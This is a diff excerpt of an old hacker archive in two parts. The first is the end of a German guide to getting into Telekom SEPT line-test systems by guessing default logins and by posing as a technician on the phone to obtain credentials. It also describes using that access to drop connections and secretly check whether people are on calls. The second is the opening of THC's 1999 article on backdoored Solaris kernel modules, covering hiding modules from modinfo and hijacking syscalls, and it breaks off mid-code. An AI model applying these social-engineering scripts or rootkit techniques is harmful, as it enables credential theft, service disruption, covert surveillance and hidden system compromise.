+vierstellige Login und # per MFV eingeben, wonach man von der unfreundlichen
+Sept-Stimme zur Eingabe des Passwortes aufgefordert wird. Auch hier benden wir
+die Eingabe mit der # , wonach entweder erneut der anfaengliche Dreiklang
+ertoent, wenn naemlich Login und Passwort falsch waren, oder uns die Stimme
+mit "Hauptmenue" begruesst. Insgesamt hat man bei der Login und Passwortabfrage
+drei Versuche, ansonsten verabschiedet sich das System mit "Auf Wiederhoeren".
+Der langweiligste und komplizierteste Teil des Sept-Hackings, naemlich die
+Logins und Pwds herauszubekommen, laesst sich auf zwei Arten ueberwinden: 
+1) Man versucht, den Zugang ins Sept durch blosses Herumprobieren zu bekommen
+  (Vorsicht: Darauf achten, unauffaellig zu bleiben!), wobei zu beachten gilt,
+  dass sowohl Login als auch Pwd meist vierstellig und zudem dem IQ der
+  Techniker angepasst sind (Ausnahmen bestaetigen die Regel, frueher haben sich
+  Login und Pwd aus bestimmten Nummern zusammengesetzt, die fuer die Regions
+  bzw. Gebietseinteilungen in numerischer Form standen, in der sich die Septs
+  befanden, teilweise werden auch heute noch diese Nummern verwendet, die sich
+  oft nicht so einfach erraten lassen) So sollte man, wenn man sich fuer die
+  erste Methode entscheiden sollte, Nummernfolgen wie "1700/1700", "2244/2244"
+  oder "2244/4422" etc. durchtesten. 
+2.) Die zweite Methode erfordert etwas mehr Selbstvertrauen, sie fuehrt
+  naemlich nicht an einem persoenlichen Gespraech mit einem Telekom-Mitarbeiter
+  vorbei bzw. sie lenkt genau darauf zu: Sicher kennen wir alle die 
+  Telekom-Stoerungsstellennummern 01171 bzw. abends 01170. Sie dienen dazu,
+  Fehler melden zu koennen, 
+  Hilfe bei technischen Fragen zu bekommen (nicht offiziell) oder Sept-Zugaenge
+  zu erhalten ;-). Unter dieser Nummer erreichen wir naemlich die 
+  Telekom-"Auftragsannahme", wo man unsere Auftraege, meist in Form von 
+  Stoerungsmeldungen, entgegennimmt. Generell gilt zu beachten, dass unsere
+  Handlungszeit sich auf die Stunden von 11 bis 16 Uhr beschraenken sollte, 
+  da erstens ab 18 Uhr alle Anrufe zentral entgegengenommen werden (man kann
+  uns nicht aushelfen) und zweitens die Zeit, in der am meisten los ist, immer
+  dazu ausgenutzt werden sollte, nicht-oeffentliche Informationen zu erfragen,
+  zu denen auch die Sept-Accounts zaehlen. In der Praxis sieht das also so aus,
+  dass man sich zu geeigneter Zeit in eine Telefonzelle oder an irgendein 
+  anderes oeffentliches Telefon begibt, und bei der 01171 anruft, bzw. um in
+  einem anderen Ort zu gelangen, bei [Vorwahl]+1171. Beide Versionen sind
+  positiverweise kostenlos, so dass man das Gespraech auch von einem ruhigeren
+  Ort, also auch aus z.B. einem Hotel fuehren kann, wo ja die Tarifeinheiten
+  meistens teurer sind. Nach Wahl der Rufnummer landet man dann in der
+  Auftragsannahme, hier beginnt unser Gepraech: Z.B. 
+  [Depp] "Auftragsannahme, Guten Tag!" 
+  [Wir] "Moin Moin, Heinz hier von der Ortsvermittlungsstelle Sowieso,
+         verbind' mich doch bitte grad mal zum Pruefplatz!"
+  [Depp] "Klar doch, Moment bitte!" 
+  [andrer Depp] "Mueller, Hallo?"
+  [Wir] "Aeh, spreche ich mit dem zustaendigen SEPT-Techniker?" 
+  [Depp] "Nein, Moment bitte" - oder "Nein, worum gehts denn?" - 
+         oder "Ja, worum gehts denn?"
+  [Wir] "Hier ist Heinz aus Sowieso, ich bin hier vor Ort und habe ein Problem,
+         es muessen hier zwei Leitungen geprueft werden, und wir haben hier die
+         Sept-Zugangsdaten vergessen, vielleicht kannst Du uns helfen?" - 
+  [Depp] "Natuerlich, wie sind denn die Rufnummern?" 
+  [Wir] "Ja sowieso..." [...] 
+  Das Ende dieses Beispielgespraeches sollte dann so aussehen, dass wir von 
+  dem Techniker mehrere Rufnummern pruefen lassen und uns z.B. jedes mal nach
+  dem Schleifenwiderstand erkundigen. Entweder wird der Techniker irgendwann
+  von selber sagen, dass mit der Leitung irgendwas nicht stimmt, oder wir
+  sagen zu einem der Schleifenwiderstaende, dass da was nicht stimmen kann.
+  (In 70% der Faelle sagt der Techniker, dass da was nicht in Ordnung ist,
+  und unbedingt geprueft werden sollte). Jedenfalls kommen wir letztendlich
+  nicht an einem Satz wie "Oh, Mann, so ein Scheiss, da muessen wir vor Ort
+  mal gucken, das bringt ja vom Pruefplatz aus nix... Du sitzt doch am
+  Pruefplatz! Kannst Du nicht mal kurz gucken, ob Du nen allgemeinen
+  Sept-Zugang findest..." vorbei. Oftmals sprechen wir auch zuerst mit einem
+  Techniker, der fuer uns die Leitungen vom Terminal aus prueft, der aber
+  selber keine Sept-Accounts hat oder geben will und uns dann zu einem
+  Sept-Fachmann durchstellt, den wir dann auf irgendeine Weise nach den
+  Zugangsdaten fragen muessen. 
+  Natuerlich wird ein Gespraech nachher niemals so aussehen, wie in dem
+  Beispiel, jedoch wird es schon so aehnlich verlaufen. Vom Prinzip her gilt
+  einfach, sich als Techniker auszugeben und sich nach "erfolglosen" 
+  Leitungspruefungen einen Account aushaendigen zu lassen. In der Theorie mag
+  das sehr weit hergeholt klingen, aber ich hatte bis jetzt bei fast jedem
+  Versuch Erfolg, der Vorteil fuer uns, der der Telekom zum Verhaengnis wird,
+  ist, dass der Sept-Techniker, von dem wir unsere Daten schliesslich erhalten,
+  nicht weiss, mit wem er spricht, da er ja fuer einen Bereich mit dem Radius
+  von 30 bis 70km zustaendig ist. Und nachdem er von uns davon ueberzeugt
+  wurde, dass die Herausgabe eines Accounts zur Fortf�hrung der Pruefung
+  notwendig ist, bleibt ihm keine andere Wahl, als die gewuenschten Infos
+  preiszugeben. Hinweis: Auch die Sept-Telefonnummer kann erfragt werden,
+  wenn sie vorher noch nicht gescannt wurde, fragt einfach nach "der neuen
+  Nummer in Sowieso" etc. 
+  Wenn ihr zu starke Bedenken habt, dann "uebt" erstmal ein bischen, indem ihr
+  in Staedten, in denen ihr vom Prinzip her mit dem Sept nichts anfangen
+  koennt, die Informationen erfragt. ->Uebung macht den Meister! In der 
+  Realitaet laeuft nachher alles sowieso meist so unkompliziert und schnell
+  ab, dass ihr euch eigentlich keine Gedanken zu machen braucht! 
+
+
+
+4. WAS FAENGT MAN MIT SEPT AN? 
+ 
+Jo, nun, nachdem ein Sept-Zugang hart erkaempft wurde, bleibt natuerlich die
+Frage, was man damit eigentlich machen soll. Weiter unten habe ich ein File
+von Crack mit reingepasted, dort sind alle Funktionen bzw. die gesamte
+Menuestruktur erklaert. Die interessantesten Eigenschaften sind natuerlich
+"Aufschalten" und "Trennen einer aktiven Verbindung". Da jedoch nur sehr selten
+Sept-Accounts mit dem Entstoerer-Level herausgegeben werden (Diese sind alle
+personalisiert, jeder Entstoer-Account gehoert genau einer Person), muss man
+sich mit dem zufrieden geben, was man bekommt. z.B. kann es sehr lustig sein,
+durch einfache Leitungspruefung einen Freund zu aergern, der grade einen
+Carrier hat, denn alleine bei einer normalen Leitungspruefung werden so starke
+Stoersignale erzeugt, dass z.B. ein Carrier floeten geht bzw. bei einem 
+Telefongespraech ein lautes Knacken erzeugt wird. Z.B. hoert bei der Funktion
+"Warten auf Freiwerden" der Teilnehmer auf der Leitung entweder ein
+regelmaessiges Klacken oder er bekommt fuer ziehmlich genau 5 Minuten den
+Waehlton gestohlen, was auch ziehmlich nervig sein kann. Lustig ist das
+Ergebnis auch, wenn man einfach waehrend einer Leitungspruefung den Hoerer
+auflegt, d.h. die Leitungspruefung unvollstaendig abgeschlossen sich selber
+ueberlaesst. Hier kann es dem Teilnehmer schonmal passieren, dass bis zu 30
+Minuten (hehe) die Leitung tot bleibt. Die Funktionen, von denen ihr Gebrauch
+machen koennt, haengen jedoch jeweils von Euch und dem Level ab, den euer
+Account hat. Ich persoenlich bevorzuge das Trennen der Leitung bei Boards oder
+das Pruefen einer Leitung nach dem Besetzt-Status, also unbemerkt pruefen, ob
+ein Freund grade telefoniert etc. Das meiste werdet ihr sowieso selber
+herausfinden, eine kleine Hilfestellung bietet auch die nun kommende Datei.
+
+Ich wuensche noch viel Spass, 
+     Haph Phun, 
+          HItronic 
+
+
+
+Menuestruktur des Septs:
+
+
+    Hauptmenue (M1)
+    ----------
+    1 Neue Rufnummer
+    2 erweiterte Pruefung (M2)
+    3 Pruefen der gleichen Leitung (M3)
+    4 Sprachmodus waehlen
+    6 Pruefergebnis aufrufen
+    8 Abmelden
+    9 Ergebnis wiederholen
+    # Leitungspruefung
+  
+    Menue Erweiterte Leitungspruefung (M1)
+    --------------------------------------
+    1 Neue Rufnummer
+    2 Menue Waehlton ermitteln (M4)
+    3 Paar ID
+    4 Messton
+    5 Schleifenwiderstand
+    8 Abmelden
+    9 Ergebnis wiederholen
+    # Erweiterte Leitungspruefung (M3)
+    * Vorheriges Menue
+  
+    Menue Pruefen gleiche Anschlussleitung (M2)
+    -------------------------------------------
+    1 Neue Rufnummer
+    2 Endstellenpruefung (M6)
+
+    3 Gebuehrenzaehlpruefung
+    4 Messton
+    5 Schleifenwiderstand
+    8 VRS verlassen
+    9 Ergebnis wiederholen
+    # Pruefen gleiche Anschlussleitung (M3)
+    * Vorheriges Menue
+  
+    Menue Pruefergebnis (M3)
+    ------------------------
+    1 Abspeicherungszeitpunkt
+
+    2 Fehlerortzuweisung
+    3 Isolationswiderstand
+    4 Spannungsdaten
+    5 Gleichstromergebnis
+    6 Wechselstromergebnis
+    7 Kapazitaetsergebnis
+    8 Abmelden
+    * Vorheriges Menue
+  
+    Menue Waehlton ermitteln (M4)
+    -----------------------------
+    2 Schleifenbeginn
+    3 Erdungsbeginn
+    4 Gemeinschaftsanschluss (M5)
+    8 Abmelden
+    * Vorheriges Menue
+  
+    Menue Endstellenpruefung (M6)
+    -----------------------------
+    2 MFV
+    3 IWV
+    8 Abmelden
+    * Zurueck
+  
+    Menue Endstellenpruefung (M6)
+    -----------------------------
+    1 Neue Rufnummer
+    2 Waehlimpulspruefung
+    3 MFV-Pruefung
+    8 Abmelden
+    * Vorheriges Menue
+  
+    Menue Leitung besetzt
+    ---------------------
+    2 Leitungsueberwachung
+    3 Freischalten & Pruefen (M3) (*)
+    4 Warten auf Freiwerden (M3)
+    5 Aufschalten und aktive Leitungsueberwachung (*)
+    8 Abmelden
+    * Zurueck
+
+
+(*) = Nur fuer Entstoerer-Level
+

Papers/slkm-1.0.html

@@ -0,0 +1,1025 @@
+<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
+<html>
+<head>
+   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
+   <meta name="GENERATOR" content="Mozilla/4.6 [en] (X11; I; SunOS 5.7 i86pc) [Netscape]">
+</head>
+<body text="#000000" bgcolor="#FFFFFF" link="#0000EF" vlink="#51188E" alink="#FF0000">
+&nbsp;
+<br>&nbsp;
+<center><table COLS=1 WIDTH="100%" NOSAVE >
+<tr NOSAVE>
+<td NOSAVE>
+<center><font size=+3>Solaris Loadable Kernel Modules</font>
+<br><i>"Attacking Solaris with loadable kernel modules" - </i>Version 1.0&nbsp;
+(c) 1999
+<p>Author: Plasmoid &lt;<a href="mailto:plasmoid@pimmel.com">plasmoid@pimmel.com</a>>
+/ THC
+<br>Sources: <a href="slkm-1.0.tar.gz">slkm-1.0.tar.gz</a>
+(flkm.c, anm.c, sitf0.1.c, sitf02.c)
+<br>The Hacker's Choice Website: <a href="http://www.thc.org/">http://www.thc.org/</a></center>
+
+<p><br>
+<br>
+<br>
+<br>
+<br>
+<p><font size=+1>Content</font>
+<ol>1&nbsp;&nbsp; Introduction
+<br>2&nbsp;&nbsp; (Un)Loading of kernel modules
+<br>3&nbsp;&nbsp; Basic structure of kernel modules under Solaris
+<ol>3.1&nbsp;&nbsp; Standard headers and structs
+<br>3.2&nbsp;&nbsp; Hiding the module
+<br>3.3&nbsp;&nbsp; _init(), _fini() and _info() calls
+<br>3.4&nbsp;&nbsp; Compiling and linking modules
+<br>--->&nbsp;&nbsp; Module: flkm.c</ol>
+4&nbsp;&nbsp; Redirecting syscalls and managing memory
+<ol>4.1&nbsp;&nbsp; Syscalls under Solaris
+<br>4.2&nbsp;&nbsp; Generating errno messages
+<br>4.3&nbsp;&nbsp; Allocating kernel memory
+<br>--->&nbsp;&nbsp; Module: anm.c</ol>
+5&nbsp;&nbsp; Implementing the common backdoors
+<ol>5.1&nbsp;&nbsp; Hiding files from getdents64()
+<br>5.2&nbsp;&nbsp; Hiding directories and file content
+<br>5.3&nbsp;&nbsp; Generating a remote switch
+<br>5.4&nbsp;&nbsp; Hiding processes (proc file system approach)
+<br>--->&nbsp;&nbsp; Module: sitf0.1.c&nbsp;
+<br>5.5&nbsp;&nbsp; Redirecting an execve() call
+<br>5.6&nbsp;&nbsp; Hiding processes (structured proc approach)
+<br>--->&nbsp;&nbsp; Module: sitf0.2.c</ol>
+6&nbsp;&nbsp; Future plans
+<br>7&nbsp;&nbsp; Closing words</ol>
+
+<hr ALIGN=LEFT SIZE=1 NOSHADE WIDTH="100%">
+<br>&nbsp;
+<p><font size=+1>1&nbsp;&nbsp; Introduction</font>
+<blockquote>Loadable kernel modules represent an important part of the
+kernel architecture. They provide an interface to hardware devices and
+data within the kernel memory. Most Unix systems enforce the usage of loadable
+kernel modules in order to offer maximum interaction with the peripherials
+and the kernel.&nbsp;
+<br>Due to those features, kernel modules have gained the interest of intruders,
+since they affect the operating system at the basic level and guarantee
+an efficient and hard to detect way to manipulate the system. In the past
+years loadable kernel modules including backdoors have been published for
+Unix systems such as Linux and FreeBSD. This article describes the technologies
+used to develop backdoored modules for the operating system Solaris 2.7
+(Sparc/Intel).
+<br>The modules conributed with this article have not been tested on Solaris
+2.6 (Sparc), if you are interested
+in testing these modules, please contact <a href="mailto:plasmoid@pimmel.com">me</a>.
+<br>Eventhough most sources listed in this article haven been tested on
+several computers running Solaris 2.7 (Ultra Sparc/Sparc/x86) and
+Solaris 2.6 (Ultra Sparc), they might crash or even destroy
+your system, therefore use all modules from the <a href="slkm-1.0.tar.gz">slkm-1.0.tar.gz</a>
+tarball with care. The modules have not been tested using Sun's C Compiler,
+instead we used the free Gnu C Compiler - available from <a href="http://www.sunfreeware.com/">sunfreeware.com</a>.
+<br>This article and its sources are designed for educational puroses only,
+I strongly advise you not to use any modules provided with this article
+on systems you do not own or aren't allowed to manipulate.</blockquote>
+
+<hr ALIGN=LEFT SIZE=1 NOSHADE WIDTH="100%">
+<br>&nbsp;
+<p><font size=+1>2&nbsp;&nbsp; (Un)Loading of kernel modules</font>
+<blockquote>Most parts of Solaris' functionality are realized using kernel
+modules (e.g. ip/tcp, scsi, ufs), tools from other vendors or authors use
+this mechanism too (e.g. ipf, pppd, oss), you can get a list of all loaded
+and (in)active modules by using the command <tt>/usr/sbin/modinfo.</tt>
+<blockquote><tt># modinfo</tt>
+<br><tt>&nbsp;Id Loadaddr&nbsp;&nbsp; Size Info Rev Module Name</tt>
+<br><tt>&nbsp; 4 fe8c6000&nbsp;&nbsp; 313e&nbsp;&nbsp; 1&nbsp;&nbsp; 1&nbsp;
+specfs (filesystem for specfs)</tt>
+<br><tt>&nbsp; 6 fe8ca414&nbsp;&nbsp; 2258&nbsp;&nbsp; 1&nbsp;&nbsp; 1&nbsp;
+TS (time sharing sched class)</tt>
+<br><tt>&nbsp; 7 fe8cc228&nbsp;&nbsp;&nbsp; 4a2&nbsp;&nbsp; -&nbsp;&nbsp;
+1&nbsp; TS_DPTBL (Time sharing dispatch table)</tt>
+<br><tt>&nbsp; 8 fe8cc27c&nbsp;&nbsp;&nbsp; 194&nbsp;&nbsp; -&nbsp;&nbsp;
+1&nbsp; pci_autoconfig (PCI BIOS interface)</tt>
+<br><tt>#</tt></blockquote>
+<tt>Id</tt> is the module-id, <tt>Loadaddr </tt>is the starting text address
+in hexadecimal, <tt>Size</tt> is the size of text, data, and bss in hexadecimal
+bytes, <tt>Info</tt> is module specific information, <tt>Rev</tt> is the
+revision of the loadable modules system, and<tt> Module Name</tt> is the
+filename and description of the module.&nbsp;
+<br>Device driver or pseudo device driver modules include an <tt>Info</tt>
+number, modules which do not communicate with a device do not include this
+information. These modules are declared as "misc" (<tt>&amp;mod_miscops</tt>)
+modules. Since we are developing a kernel module for an attacking approach,
+we will later generate such a miscellaneous module.
+<p>In order to load or unload kernel modules, you can use the two commands
+<tt>/usr/sbin/modload
+</tt>and<tt>
+/usr/sbin/modunload. </tt>Modload's command line is the name of a module
+and modunload's command line "<tt>-i ID</tt>" the <tt>Id </tt>of a loaded
+module (see modinfo above.).&nbsp;
+<blockquote><tt># modinfo -i 125</tt>
+<br><tt>&nbsp;Id Loadaddr&nbsp;&nbsp; Size Info Rev Module Name</tt>
+<br><tt>125 fe95959c&nbsp;&nbsp;&nbsp; 125&nbsp;&nbsp; -&nbsp;&nbsp; 1&nbsp;
+flkm (First Loadable Kernel Module)</tt>
+<br><tt># modunload -i 125</tt></blockquote>
+Solaris includes a lot of good man pages dealing with kernel modules, (un)loading,
+information and even programming. You should take a look at those, but
+don't get confused the example code within "man _init" compiles but does
+not load. If you have access to Solaris' AnswerBook2 take a look at the
+sections describing the development of device drivers.</blockquote>
+
+<hr ALIGN=LEFT SIZE=1 NOSHADE WIDTH="100%">
+<br>&nbsp;
+<p><font size=+1>3&nbsp;&nbsp; Basic structure of kernel modules under
+Solaris</font>
+<blockquote>Kernel modules under Solaris need a lot of definied variables
+in order to get loaded into the system, this is a major difference to Linux
+kernel modules that can easily be created by just using an <tt>init_module()
+</tt>and
+<tt>cleanup_module()</tt>
+call. Take a look at pragmatic's articles about kernel modules for <a href="LKM_HACKING.html">Linux</a>
+and <a href="bsdkern.html">FreeBSD</a>.</blockquote>
+<font size=+1>3.1&nbsp;&nbsp; Standard headers and structs</font>
+<blockquote>Eventhough we don't want to develop a device driver module,
+we have to include the DDI, SunDDI and the modctl headers that provide
+us with structs as <tt>modlinkage</tt> and <tt>mod_ops</tt>. The first
+lines of a module look like this:
+<blockquote><tt>#include &lt;sys/ddi.h></tt>
+<br><tt>#include &lt;sys/sunddi.h></tt>
+<p><tt>/*</tt>
+<br><tt>&nbsp;* This is the loadable module wrapper.</tt>
+<br><tt>&nbsp;*/</tt>
+<br><tt>#include &lt;sys/modctl.h></tt>
+<p><tt>extern struct mod_ops mod_miscops;</tt>
+<p><tt>/*</tt>
+<br><tt>&nbsp;* Module linkage information for the kernel.</tt>
+<br><tt>&nbsp;*/</tt>
+<br><tt>static struct modlmisc modlmisc = {</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; &amp;mod_miscops,</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; "First Loadable Kernel Module",</tt>
+<br><tt>};</tt>
+<p><tt>static struct modlinkage modlinkage = {</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; MODREV_1,</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; (void *)&amp;modlmisc,</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; NULL</tt>
+<br><tt>};</tt></blockquote>
+As you can see, we include some external structs into the module and define
+the name of the kernel module inside the <tt>modlmisc</tt> struct. The
+<tt>modlinkage</tt>
+struct references <tt>modlmisc</tt> and tells the kernel that this is not
+a device driver module and that no info flag is displayed by <tt>modinfo</tt>.
+If you want to go into the details of these structs and maybe develop device
+or pseudo device driver module, take a look at the following man pages:
+modldrv(9S), modlinkage(9S) and modlstrmod(9S). If you just want to understand
+the backdoored modules in this article, simply read on.</blockquote>
+<font size=+1>3.2&nbsp;&nbsp; Hiding the module</font>
+<blockquote>If we change the name of the kernel module to an empty string
+("") in the <tt>modlmisc</tt> struct, <tt>modinfo</tt> will not display
+the module, eventhough it is loaded and its <tt>Id</tt> is reserved. This
+is a useful feature for hiding the module and the module can still be unloaded
+if you know its Id. Grabbing this <tt>Id</tt> is simple, if you take a
+look at the modules <tt>Id</tt>s before loading the module and later after
+some other modules have been loaded.
+<blockquote><tt># modinfo</tt>
+<br><tt>&nbsp;Id Loadaddr&nbsp;&nbsp; Size Info Rev Module Name</tt>
+<br>[...]
+<br><tt>122 fe9748e8&nbsp;&nbsp;&nbsp; e08&nbsp; 13&nbsp;&nbsp; 1&nbsp;
+ptem (pty hardware emulator)</tt>
+<br><tt>123 fe983fd8&nbsp;&nbsp;&nbsp; 1c0&nbsp; 14&nbsp;&nbsp; 1&nbsp;
+redirmod (redirection module)</tt>
+<br><tt>124 fe9f60a4&nbsp;&nbsp;&nbsp; cfc&nbsp; 15&nbsp;&nbsp; 1&nbsp;
+bufmod (streams buffer mod)</tt>
+<br><tt># modload flkm</tt>
+<br>&nbsp;
+<p><tt># modinfo</tt>
+<br><tt>&nbsp;Id Loadaddr&nbsp;&nbsp; Size Info Rev Module Name</tt>
+<br>[...]
+<br><tt>122 fe9748e8&nbsp;&nbsp;&nbsp; e08&nbsp; 13&nbsp;&nbsp; 1&nbsp;
+ptem (pty hardware emulator)</tt>
+<br><tt>123 fe983fd8&nbsp;&nbsp;&nbsp; 1c0&nbsp; 14&nbsp;&nbsp; 1&nbsp;
+redirmod (redirection module)</tt>
+<br><tt>124 fe9f60a4&nbsp;&nbsp;&nbsp; cfc&nbsp; 15&nbsp;&nbsp; 1&nbsp;
+bufmod (streams buffer mod)</tt>
+<br><tt>126 fe9f8e5c&nbsp;&nbsp; 8e3c&nbsp; 13&nbsp;&nbsp; 1&nbsp; pcfs
+(filesystem for PC)</tt>
+<br><tt>127 fea018d4&nbsp;&nbsp; 19e1&nbsp;&nbsp; -&nbsp;&nbsp; 1&nbsp;
+diaudio (Generic Audio)</tt>
+<br><tt>128 fe94aed0&nbsp;&nbsp;&nbsp; 5e3&nbsp; 72&nbsp;&nbsp; 1&nbsp;
+ksyms (kernel symbols driver)</tt>
+<br>&nbsp;</blockquote>
+</blockquote>
+
+<blockquote>As you can see the <tt>Id 125</tt> is obviously not reserved
+and we loaded our kernel module into the memory with no name string in
+the <tt>modlmisc</tt> struct. If we want to unload it now, we can easily
+do this by unloading the <tt>Id 125</tt>. Those unreserved <tt>Id</tt>s
+can be found in a <tt>modinfo</tt> listing at different places, but due
+to the fact that <tt>modunload</tt> won't return an error if you try to
+unload a non existing module, nobody can detect our module by using <tt>modinfo</tt>
+or <tt>modunload</tt>. The second version of this article will include
+mechanisms to completely protect a module from being listed and unloaded.
+This can only be done by patching the Solaris module ksyms that lists and
+manages all kernel symbols. Even if this protection leaving the module's
+name blank is weak, it will fit your needs, if the system administrator
+is not a real system programmer.</blockquote>
+<font size=+1>3.3&nbsp;&nbsp; _init(), _fini() and _info() calls</font>
+<blockquote>A kernel module under Solaris must include at least the following
+three functions: <tt>_init()</tt>, <tt>_fini()</tt> and <tt>_info()</tt>.
+<tt>_init()
+</tt>initializes
+a loadable module, it is called before any other routine in a loadable
+module. Within an <tt>_init()</tt> call you need to call another function
+called <tt>mod_install()</tt> that takes the <tt>modlinkage</tt> struct
+as an argument. <tt>_init()</tt> returns the value returned by mod_install().
+The returned value should be interpreted in order to catch errors while
+loading the module.
+<blockquote><tt>int _init(void)</tt>
+<br><tt>{</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; int i;</tt>
+<p><tt>&nbsp;&nbsp;&nbsp; if ((i = mod_install(&amp;modlinkage)) != 0)</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; cmn_err(CE_NOTE,"Could
+not install module\n");</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; else</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; cmn_err(CE_NOTE,"flkm:
+successfully installed");</tt>
+<p><tt>&nbsp;&nbsp;&nbsp; return i;</tt>
+<br><tt>}</tt></blockquote>
+The <tt>_info()</tt> function returns information about a loadable module,
+within this function the call <tt>mod_info() </tt>has to be made. If we
+use an empty name in the <tt>modinfo</tt> struct <tt>mod_info()</tt> will
+return no information to <tt>/usr/sbin/modinfo</tt>.&nbsp;
+<blockquote><tt>int _info(struct modinfo *modinfop)</tt>
+<br><tt>{</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; return (mod_info(&amp;modlinkage, modinfop));</tt>
+<br><tt>}</tt></blockquote>
+<tt>_fini()</tt> prepares a loadable module for unloading. It is called
+when the system wants to unload a module. Within <tt>_fini() </tt>a call
+to<tt> mod_remove()</tt> has to be placed. It is also wise to catch the
+return values in order to report errors while unloading the module.
+<blockquote><tt>int _fini(void)</tt>
+<br><tt>{</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; int i;</tt>
+<p><tt>&nbsp;&nbsp;&nbsp; if ((i = mod_remove(&amp;modlinkage)) != 0)</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; cmn_err(CE_NOTE,"Could
+not remove module\n");</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; else</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; cmn_err(CE_NOTE,"flkm:
+successfully removed");</tt>
+<p><tt>&nbsp;&nbsp;&nbsp; return i;</tt>
+<br><tt>}</tt></blockquote>
+A good documentation about these calls can be found in the following Solaris
+man pages: <tt>_info(9E)</tt> and <tt>mod_install(9F)</tt>. If you are
+calling <tt>cmn_err()</tt> with <tt>CE_NOTE</tt> as level from a running
+module the output will be printed to your syslogd as a notice. <tt>cmn_err()</tt>
+is function to output information from kernel memory, it can also be used
+to set run levels if you are debugging your module.</blockquote>
+<font size=+1>3.4 Compiling and linking modules</font>
+<blockquote>Compiling a module is very simple, all you need to set are
+some definitions that tell the included code this will be a kernel module
+and not a normal executable. You should always link your module's object
+file with the "-r" option otherwise the module will not load, because
+the kernel module linker will not be able to link the module.
+<blockquote><tt>gcc -D_KERNEL -DSVR4 -DSOL2 -O2 -c flkm.c</tt>
+<br><tt>ld -o flkm -r flkm.o</tt></blockquote>
+The Solaris kernel does not include as many standard C function as the
+Linux kernel, if you want to use some of those standard libC functions,
+extract them from the libc.a archive in /lib and link them to your module
+using the <tt>ar</tt> command. If you are one of those lucky guys owning
+the Solaris 2.7 source and knowing where to find what you are looking for
+inside the weird source of Solaris, include the original source of the
+extracted objects.
+<blockquote><tt>ar -x /lib/libc.a memmove.o memcpy.o strstr.o</tt>
+<br><tt>ld -o flkm -r flkm.o memmove.o memcpy.o strstr.o</tt></blockquote>
+In my examples I included a switch called <tt>DEBUG</tt>, this switch will
+activate a lot of debug outputs, if you are one of those nasty hackers
+don't forget to undefine <tt>DEBUG</tt> in the code or configure the Makefile.
+<tt>DEBUG
+</tt>is
+a very common definition if working with kernel modules, there are some
+kernel functions that might help you debugging, e.g. <tt>ASSERT()</tt>.</blockquote>
+<font size=+1>-->&nbsp;&nbsp; Module: flkm.c</font>
+<blockquote>The Module flkm.c (First Loadable Kernel Module) from the package
+<a href="slkm-1.0.tar.gz">slkm-1.0.tar.gz</a>
+demonstrates the techniques described in sections 3.1-3.4 and represents
+an empty working module that should be easily loadable into the kernel.</blockquote>
+
+<hr ALIGN=LEFT SIZE=1 NOSHADE WIDTH="100%">
+<br>&nbsp;
+<p><font size=+2>4&nbsp;&nbsp; </font><font size=+1>Redirecting syscalls
+and managing memory</font>
+<blockquote>Redirecting syscalls is one of the important things if you
+write backdoored kernel modules, instead of developing your own functions,
+you redirect the common syscalls to your fake syscalls that will do what
+ever you want. If you want to get an idea of what can be done using faked
+syscalls take a look at pragmatic's article at <a href="http://www.thc.org/">www.thc.org</a>.&nbsp;</blockquote>
+<font size=+2>4.1&nbsp;&nbsp; </font><font size=+1>Syscalls under Solaris</font>
+<blockquote>Syscalls under Solaris are stored in an array <tt>sysent[]
+</tt>each
+entry is a structure that hold information about a syscall. The values
+for all syscalls can be found in the file <tt>/usr/include/sys/syscall.h</tt>.
+If you take a closer look at the list of syscalls, you will recognize that
+there are some major differences to the Linux syscall header file. So be
+careful if you try to port a Linux kernel module to Solaris.&nbsp;
+<br>The syscalls
+<tt>open()</tt>,
+<tt>creat()</tt>, etc are not used for
+filesystem functions, instead the following calls are used
+<tt>open64()</tt>,
+<tt>creat64()</tt>,
+etc. Before you try to redirect a syscall under Solaris use the tool <tt>/usr/bin/truss</tt>
+to trace the syscalls of the programm that uses your syscalls, e.g. <tt>ps</tt>
+uses the <tt>open() </tt>call to check the files inside the proc tree while
+<tt>cat</tt>
+uses the <tt>open64()
+</tt>to open a file from the filesystems even if
+it is within the proc tree. Let's look at some example code:
+<blockquote><tt>int (*oldexecve) (const char *, const char *[], const char
+*[]);</tt>
+<br><tt>int (*oldopen64) (const char *path, int oflag, mode_t mode);</tt>
+<br><tt>int (*oldread) (int fildes, void *buf, size_t nbyte);</tt>
+<br><tt>int (*oldcreat64) (const char *path, mode_t mode);</tt>
+<br>[...]
+<p><tt>int newcreat64(const char *path, mode_t mode)&nbsp;</tt>
+<br><tt>{</tt>
+<br>[...]
+<p><tt>int _init(void)</tt>
+<br><tt>{</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; int i;</tt>
+<p><tt>&nbsp;&nbsp;&nbsp; if ((i = mod_install(&amp;modlinkage)) != 0)</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; cmn_err(CE_NOTE,"Could
+not install module\n");</tt>
+<br><tt>#ifdef DEBUG</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; else</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; cmn_err(CE_NOTE,"anm:
+successfully installed");</tt>
+<br><tt>#endif</tt>
+<p><tt>&nbsp;&nbsp;&nbsp; oldexecve = (void *) sysent[SYS_execve].sy_callc;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; oldopen64 = (void *) sysent[SYS_open64].sy_callc;</tt>
